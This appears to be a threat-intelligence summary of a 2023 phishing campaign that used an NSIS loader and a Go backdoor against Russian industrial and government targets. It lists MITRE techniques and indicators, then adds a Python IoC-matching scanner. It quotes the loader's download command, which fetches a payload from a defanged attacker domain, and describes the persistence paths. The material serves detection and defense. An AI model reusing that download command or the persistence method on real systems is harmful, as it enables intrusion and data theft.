Attacks on the industrial and government sectors of the Russian Federation

A Russian-targeted phishing campaign delivered an NSIS-based loader that installs backdoors and data-stealing components, with the Go-written UsrRunVGA.exe as the main backdoor. The operation ran in two waves and used anti-virtualization checks, encrypted data exfiltration, and multiple C2 domains to collect and transmit stolen data.

Keypoints

  • The initial artifact Finansovyy_kontrol_2023_180529.rar was distributed as an email attachment in early June 2023 and served as the campaign's initial stage.
  • The NSIS script decrypts strings, opens a legitimate-looking Finansovyy_kontrol_2023_180529.pdf to distract the user, and attempts to download a malicious payload from a remote resource.
  • The dropper installs UsrRunVGA.exe to C:\ProgramData\Microsoft\DeviceSync and adds it to startup via a startup shortcut (menu.lnk), ensuring persistence.
  • UsrRunVGA.exe is a Go-based backdoor with obfuscated strings, anti-VM/anti-sandbox checks, and modules for data theft and remote control.
  • Exfiltrated data is AES-256-GCM encrypted with a fixed embedded key and sent to the C2 server; an RSA-encrypted command list indicates evolving use of cryptography.
  • A second campaign (mid-August 2023) connected to lunnayareka[.]com and added stronger anti-analysis checks and browser data theft capabilities, including password theft from numerous browsers.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – The first artifact of the attack was the malicious file finansovyy_kontrol_2023_180529.rar, which was distributed as an email attachment. [‘Phishing: Spearphishing Attachment’]
  • [T1059.003] Execution – Command and Scripting Interpreter: Windows Command Shell – The NSIS loader calls commands like INetC::get to fetch payloads, e.g., INetC::get /SILENT /USERAGENT "Mozilla/5.0" "hxxps://fas-gov-ru[.]com/?e&n=zr6tjbinjvef86". [‘Windows Command Shell’]
  • [T1204.002] Execution – User Execution: Malicious File – The attacker opens a legitimate-looking document (finansovyy_kontrol_2023_180529.pdf) to distract the user. [‘Malicious File’]
  • [T1547.001] Persistence – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – The loader copies the payload to C:\ProgramData\Microsoft\DeviceSync\UsrRunVGA.exe and creates startup/autostart mechanisms (StartUp menu.lnk). [‘Startup Folder’]
  • [T1202] Defense Evasion – Indirect Command Execution – The NSIS script triggers indirect execution paths to download and run components. [‘Indirect Command Execution’]
  • [T1070.004] Defense Evasion – Indicator Removal: File Deletion – The analysis notes mechanisms to minimize traces, described as flag checks that prevent re-running. [‘File Deletion’]
  • [T1027] Defense Evasion – Obfuscated Files or Information – Strings and code are XOR-encrypted/obfuscated in the NSIS script and the backdoor binary. [‘Obfuscated Files or Information’]
  • [T1087.001] Discovery – Account Discovery: Local Account – The backdoor enumerates local account/configuration to tailor actions. [‘Account Discovery: Local Account’]
  • [T1083] Discovery – File and Directory Discovery – The malware searches for files and directories for exfiltration targets. [‘File and Directory Discovery’]
  • [T1518.001] Discovery – Software Discovery: Security Software Discovery – Checks against security software and virtualization indicators. [‘Security Software Discovery’]
  • [T1082] Discovery – System Information Discovery – The backdoor gathers system information (via ghw) to decide on execution. [‘System Information Discovery’]
  • [T1033] Discovery – System Owner/User Discovery – The malware collects user/system identifiers to enforce checks. [‘System Owner/User Discovery’]
  • [T1560.002] Collection – Archive Collected Data: Archive via Library – Data collected is archived for exfiltration. [‘Archive via Library’]
  • [T1005] Collection – Data from Local System – Data theft directly from the compromised host. [‘Data from Local System’]
  • [T1071.001] Command and Control – Application Layer Protocol: Web Protocols – Exfiltration and C2 communications use HTTPS/Web protocols. [‘Web Protocols’]
  • [T1132.001] Command and Control – Data Encoding: Standard Encoding – Data is encoded for exfiltration. [‘Standard Encoding’]
  • [T1573.001] Command and Control – Encrypted Channel: Symmetric Cryptography – AES encryption of exfil data and embedded keys. [‘Symmetric Cryptography’]

Indicators of Compromise

  • [Domain] – fas-gov-ru[.]com, tantsuyushchiykarlik[.]com, lunnayareka[.]com, and other malicious domains referenced in the campaign
  • [File name] – finansovyy_kontrol_2023_180529.rar, finansovyy_kontrol_2023_180529.com, detali_dogovora_no_2023_000849.com
  • [Executable] – UsrRunVGA.exe (Go-based backdoor); Dmcserv.exe; Netrunner.exe (seen in the first phishing wave)
  • [Startup/Startup Shortcut] – %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\menu.lnk
  • [URL] – hxxps://fas-gov-ru[.]com/?e&n=zr6tjbinjvef86, hxxps://tantsuyushchiykarlik[.]com/?h= (C2 URL)
  • [User-Agent] – Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.5
  • [Disk model/Device info] – values derived from ghw library (e.g., disk_model sent to C2)
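As an added example that is not part of the report, the following Python scanner applies the file-name, drop-path, startup-shortcut, domain and User-Agent indicators listed above to host telemetry. The Sysmon-like field names (image, target, query, host, user_agent) and the sample events are assumptions constructed for the demo; defanged domains are refanged before matching.

```python
import json
import re

def refang(indicator: str) -> str:  # "fas-gov-ru[.]com" -> "fas-gov-ru.com"
    return indicator.replace("[.]", ".").replace("hxxp", "http")

# Indicators taken from the report above; all comparisons are done in lower case.
C2_DOMAINS = {refang(d) for d in ("fas-gov-ru[.]com", "tantsuyushchiykarlik[.]com", "lunnayareka[.]com")}
CAMPAIGN_FILES = {"finansovyy_kontrol_2023_180529.rar", "finansovyy_kontrol_2023_180529.com",
                  "detali_dogovora_no_2023_000849.com", "usrrunvga.exe", "dmcserv.exe", "netrunner.exe"}
DROP_DIR = r"c:\programdata\microsoft\devicesync"
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\menu\.lnk$")
LOADER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.5")

def match_event(event: dict) -> list:
    """Return (technique, reason) pairs for one event; field names are assumed, Sysmon-like."""
    hits = []
    for field, value in event.items():
        if not isinstance(value, str):
            continue
        low = value.lower()
        name = low.rsplit("\\", 1)[-1]  # last path component, or the whole value if no path
        if name in CAMPAIGN_FILES:
            hits.append(("IoC", f"{field}: campaign file name {name}"))
        if low.startswith(DROP_DIR + "\\"):
            hits.append(("T1547.001", f"{field}: binary staged under {DROP_DIR}"))
        if STARTUP_LNK.search(low):
            hits.append(("T1547.001", f"{field}: startup shortcut menu.lnk written"))
        if field in ("query", "host") and low in C2_DOMAINS:
            hits.append(("T1071.001", f"{field}: contact with campaign C2 domain {low}"))
        if value == LOADER_UA:
            hits.append(("T1071.001", f"{field}: loader User-Agent string"))
    return hits

def scan(lines) -> list:
    """Parse one JSON event per line; return [(line_no, hits)] for the events that matched."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := match_event(json.loads(line)))]

# Constructed telemetry for the demo, not taken from the report (the last event is benign).
SAMPLE_EVENTS = [
    {"type": "file_create", "image": r"C:\Users\ivan\AppData\Local\Temp\finansovyy_kontrol_2023_180529.com",
     "target": r"C:\Users\ivan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\menu.lnk"},
    {"type": "process_create", "image": r"C:\ProgramData\Microsoft\DeviceSync\UsrRunVGA.exe"},
    {"type": "dns_query", "image": r"C:\ProgramData\Microsoft\DeviceSync\UsrRunVGA.exe", "query": "lunnayareka.com"},
    {"type": "http", "host": "fas-gov-ru.com", "url": "/?e&n=zr6tjbinjvef86", "user_agent": LOADER_UA},
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]
```

Calling scan(SAMPLE_LINES) flags the first four events and leaves the notepad.exe event untouched; in practice the lines would come from an EDR or SIEM export rather than the embedded list.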

Read more: https://securelist.ru/ataki-na-industrialnyj-i-gosudarstvennyj-sektory-rf/108229/